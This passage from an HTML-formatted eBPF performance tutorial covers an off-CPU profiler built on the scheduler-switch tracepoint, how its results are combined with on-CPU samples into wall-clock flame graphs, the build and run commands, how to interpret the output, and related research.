    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;state&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;get_task_state&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;state&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;handle_sched_switch&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;preempt&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_struct&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;prev&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_struct&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;next&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;internal_key&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;i_keyp&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;i_key&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;val_t&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;valp&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;s64&lt;/span&gt; &lt;span class="n"&gt;delta&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;u32&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;allow_record&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prev&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prev&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_smp_processor_id&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
        &lt;span class="n"&gt;i_key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;i_key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prev&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;i_key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;start_ts&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ktime_get_ns&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prev&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;flags&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;PF_KTHREAD&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;i_key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_stack_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt;
            &lt;span class="n"&gt;i_key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_stack_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_stackid&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;stackmap&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_F_USER_STACK&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;i_key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kern_stack_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_stackid&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;stackmap&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;bpf_map_update_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;start&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;i_key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;bpf_probe_read_kernel_str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prev&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prev&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
        &lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;delta&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;bpf_map_update_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;info&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;i_key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_NOEXIST&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;BPF_CORE_READ&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;next&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;i_keyp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;start&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;i_keyp&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;delta&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;s64&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="n"&gt;bpf_ktime_get_ns&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;i_keyp&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;start_ts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;delta&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;delta&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;min_block_ns&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="n"&gt;delta&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;max_block_ns&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;delta&lt;/span&gt; &lt;span class="o"&gt;/=&lt;/span&gt; &lt;span class="mi"&gt;1000U&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;valp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;info&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;i_keyp&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;valp&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;__sync_fetch_and_add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;valp&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;delta&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;delta&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="nl"&gt;cleanup:&lt;/span&gt;
    &lt;span class="n"&gt;bpf_map_delete_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;start&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"tp_btf/sched_switch"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;BPF_PROG&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sched_switch&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;preempt&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_struct&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;prev&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_struct&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;next&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;handle_sched_switch&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;preempt&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;prev&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;next&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;LICENSE&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The off-CPU profiler is more complex because it needs to track timing across multiple events. The &lt;code&gt;start&lt;/code&gt; map stores timestamps and stack information for threads that go off-CPU. When a thread blocks, we record when it happened and why (the stack trace). When that same thread returns to running, we calculate how long it was blocked.&lt;/p&gt;

&lt;p&gt;The scheduler switch happens many times per second on a busy system, so performance matters. The &lt;code&gt;allow_record()&lt;/code&gt; function quickly filters out threads we don't care about before doing expensive operations. If a thread passes the filter, the program captures the current timestamp using &lt;code&gt;bpf_ktime_get_ns()&lt;/code&gt; and records the stack traces showing where the thread blocked.&lt;/p&gt;

&lt;p&gt;The key insight is in the two-stage approach. The &lt;code&gt;prev&lt;/code&gt; task (the thread going off-CPU) gets its blocking point recorded with a timestamp. When the scheduler later switches to the &lt;code&gt;next&lt;/code&gt; task (a thread waking up), we look up whether we previously recorded this thread going to sleep. If we find a record, we calculate the delta between now and when it went to sleep. This delta is the off-CPU time in nanoseconds, which we convert to microseconds and add to the accumulated total for that stack trace.&lt;/p&gt;

&lt;h3&gt;
  
  
  User-Space Programs: Loading and Processing
&lt;/h3&gt;

&lt;p&gt;Both tools follow a similar pattern in user space. They use libbpf to load the compiled eBPF object file and attach it to the appropriate event. For &lt;code&gt;oncputime&lt;/code&gt;, this means setting up perf events at the desired sampling frequency. For &lt;code&gt;offcputime&lt;/code&gt;, it means attaching to the scheduler tracepoint. The user space programs then periodically read the BPF maps, resolve the stack IDs to actual function names using symbol tables, and format the output.&lt;/p&gt;

&lt;p&gt;The symbol resolution is handled by the blazesym library, which parses DWARF debug information from binaries. When you see a stack trace with function names and line numbers, that's blazesym converting raw instruction pointer addresses into human-readable form. The user space programs output in "folded" format, where each line contains a semicolon-separated stack trace followed by a count or time value. This format feeds directly into flame graph generation tools.&lt;/p&gt;

&lt;h2&gt;
  
  
  Combining On-CPU and Off-CPU Profiles
&lt;/h2&gt;

&lt;p&gt;The real power comes from running both tools together and merging their results. The &lt;code&gt;wallclock_profiler.py&lt;/code&gt; script orchestrates this process. It launches both profilers simultaneously on the target process, waits for them to complete, and then combines their outputs.&lt;/p&gt;

&lt;p&gt;The challenge is that the two tools measure different things in different units. The on-CPU profiler counts samples (49 per second by default), while the off-CPU profiler measures microseconds. To create a unified view, the script normalizes the off-CPU time to equivalent sample counts. If sampling at 49 Hz, each sample represents about 20,408 microseconds of potential execution time. The script divides off-CPU microseconds by this value to get equivalent samples.&lt;/p&gt;

&lt;p&gt;After normalization, the script adds annotations to distinguish the two types of time. On-CPU stack traces get a &lt;code&gt;_[c]&lt;/code&gt; suffix (for compute), while off-CPU stacks get &lt;code&gt;_[o]&lt;/code&gt; (for off-CPU or blocking). A custom color palette in the flame graph tool renders these different colors, red for CPU time and blue for blocking time. The result is a single flame graph where you can see both types of activity and their relative magnitudes.&lt;/p&gt;

&lt;p&gt;The script also handles multi-threaded applications by profiling each thread separately. It detects threads at startup, launches parallel profiling sessions for each one, and generates individual flame graphs showing per-thread behavior. This helps identify which threads are busy versus idle, and whether your parallelism is effective.&lt;/p&gt;

&lt;h2&gt;
  
  
  Compilation and Execution
&lt;/h2&gt;

&lt;p&gt;Building the tools requires a standard eBPF development environment. The tutorial repository includes all dependencies in the &lt;code&gt;src/third_party/&lt;/code&gt; directory. To build:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;src/32-wallclock-profiler
make
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Makefile compiles the eBPF C code with clang, generates skeletons with bpftool, builds the blazesym symbol resolver, and links everything with libbpf to create the final executables.&lt;/p&gt;

&lt;p&gt;To use the individual tools:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Profile on-CPU execution for 30 seconds&lt;/span&gt;
&lt;span class="nb"&gt;sudo&lt;/span&gt; ./oncputime &lt;span class="nt"&gt;-p&lt;/span&gt; &amp;lt;PID&amp;gt; &lt;span class="nt"&gt;-F&lt;/span&gt; 99 30

&lt;span class="c"&gt;# Profile off-CPU blocking for 30 seconds&lt;/span&gt;
&lt;span class="nb"&gt;sudo&lt;/span&gt; ./offcputime &lt;span class="nt"&gt;-p&lt;/span&gt; &amp;lt;PID&amp;gt; &lt;span class="nt"&gt;-m&lt;/span&gt; 1000 30

&lt;span class="c"&gt;# Use the combined profiler (recommended)&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;python3 wallclock_profiler.py &amp;lt;PID&amp;gt; &lt;span class="nt"&gt;-d&lt;/span&gt; 30 &lt;span class="nt"&gt;-f&lt;/span&gt; 99
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Let's try profiling a test program that does both CPU work and blocking I/O:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Build and run the test program&lt;/span&gt;
&lt;span class="nb"&gt;cd &lt;/span&gt;tests
make
./test_combined &amp;amp;
&lt;span class="nv"&gt;TEST_PID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;$!&lt;/span&gt;

&lt;span class="c"&gt;# Profile it with the combined profiler&lt;/span&gt;
&lt;span class="nb"&gt;cd&lt;/span&gt; ..
&lt;span class="nb"&gt;sudo &lt;/span&gt;python3 wallclock_profiler.py &lt;span class="nv"&gt;$TEST_PID&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; 30

&lt;span class="c"&gt;# This generates:&lt;/span&gt;
&lt;span class="c"&gt;# - combined_profile_pid&amp;lt;PID&amp;gt;_&amp;lt;timestamp&amp;gt;.folded (raw data)&lt;/span&gt;
&lt;span class="c"&gt;# - combined_profile_pid&amp;lt;PID&amp;gt;_&amp;lt;timestamp&amp;gt;.svg (flame graph)&lt;/span&gt;
&lt;span class="c"&gt;# - combined_profile_pid&amp;lt;PID&amp;gt;_&amp;lt;timestamp&amp;gt;_single_thread_analysis.txt (time breakdown)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The output flame graph will show red frames for the &lt;code&gt;cpu_work()&lt;/code&gt; function consuming CPU time, and blue frames for the &lt;code&gt;blocking_work()&lt;/code&gt; function spending time in sleep. The relative widths show how much wall clock time each consumes.&lt;/p&gt;

&lt;p&gt;For multi-threaded applications, the profiler creates a directory with per-thread results:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Profile a multi-threaded application&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;python3 wallclock_profiler.py &amp;lt;PID&amp;gt; &lt;span class="nt"&gt;-d&lt;/span&gt; 30

&lt;span class="c"&gt;# Output in multithread_combined_profile_pid&amp;lt;PID&amp;gt;_&amp;lt;timestamp&amp;gt;/&lt;/span&gt;
&lt;span class="c"&gt;# - thread_&amp;lt;TID&amp;gt;_main.svg (main thread flame graph)&lt;/span&gt;
&lt;span class="c"&gt;# - thread_&amp;lt;TID&amp;gt;_&amp;lt;role&amp;gt;.svg (worker thread flame graphs)&lt;/span&gt;
&lt;span class="c"&gt;# - *_thread_analysis.txt (time analysis for all threads)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The analysis files show time accounting, letting you verify that on-CPU plus off-CPU time adds up correctly to the wall clock profiling duration. Coverage percentages help identify if threads are mostly idle or if you're missing data.&lt;/p&gt;

&lt;h2&gt;
  
  
  Interpreting the Results
&lt;/h2&gt;

&lt;p&gt;When you open the flame graph SVG in a browser, each horizontal box represents a function in a stack trace. The width shows how much time was spent there. Boxes stacked vertically show the call chain, with lower boxes calling higher ones. Red boxes indicate on-CPU time, blue boxes show off-CPU time.&lt;/p&gt;

&lt;p&gt;Look for wide red sections to find CPU bottlenecks. These are functions burning through cycles in tight loops or expensive algorithms. Wide blue sections indicate blocking operations. Common patterns include file I/O (read/write system calls), network operations (recv/send), and lock contention (futex calls).&lt;/p&gt;

&lt;p&gt;The flame graph is interactive. Click any box to zoom in and see details about that subtree. The search function lets you highlight all frames matching a pattern, useful for finding specific functions or libraries. Hovering shows the full function name and exact sample count or time value.&lt;/p&gt;

&lt;p&gt;Pay attention to the relative proportions. An application that's 90% blue is I/O bound and probably won't benefit much from CPU optimization. One that's mostly red is CPU bound. Applications split evenly between red and blue might benefit from overlapping computation and I/O, such as using asynchronous I/O or threading.&lt;/p&gt;

&lt;p&gt;For multi-threaded profiles, compare the per-thread flame graphs. Ideally, worker threads should show similar patterns if the workload is balanced. If one thread is mostly red while others are mostly blue, you might have load imbalance. If all threads show lots of blue time in futex waits with similar stacks, that's lock contention.&lt;/p&gt;

&lt;h2&gt;
  
  
  Related Work and Further Reading
&lt;/h2&gt;

&lt;p&gt;Wall-clock profiling builds on decades of research in performance analysis that distinguishes on-CPU computation from off-CPU waiting. Curtsinger and Berger's Coz (ASPLOS'15) introduced causal profiling, which experimentally determines which code regions, if optimized, actually reduce end-to-end latency—addressing the fundamental question of where optimization effort pays off. Zhou et al.'s wPerf (OSDI'18) presented a generic off-CPU analysis framework that identifies critical waiting events (locks, I/O) bounding throughput with low overhead, while the more recent work by Ahn et al. (OSDI'24) unified on- and off-CPU analysis through blocked-sample profiling that captures both running and blocked thread states. The visualization techniques we employ draw from Gregg's flame graph methodology (CACM'16, USENIX ATC'17), which transforms stack-trace aggregations into intuitive hierarchical diagrams; his off-CPU flame graphs specifically highlight blocking patterns by rendering sleep stacks in contrasting colors. Timing accuracy itself poses challenges, as Najafi et al. (HotOS'21) argue that modern systems research increasingly depends on precise wall-clock measurements, and earlier work on time-sensitive Linux (Goel et al., OSDI'02) explored kernel techniques for low-latency timing under load. Practical eBPF-based profiling has been demonstrated in production contexts, including Java profiling with off-CPU "offwaketime" analysis (ICPE'19) and comprehensive workflows outlined in recent eBPF performance tutorials (Gregg, SIGCOMM'24). Together, these techniques and tools provide the foundation for understanding where applications spend time and how to optimize holistically across both compute and blocking dimensions.&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

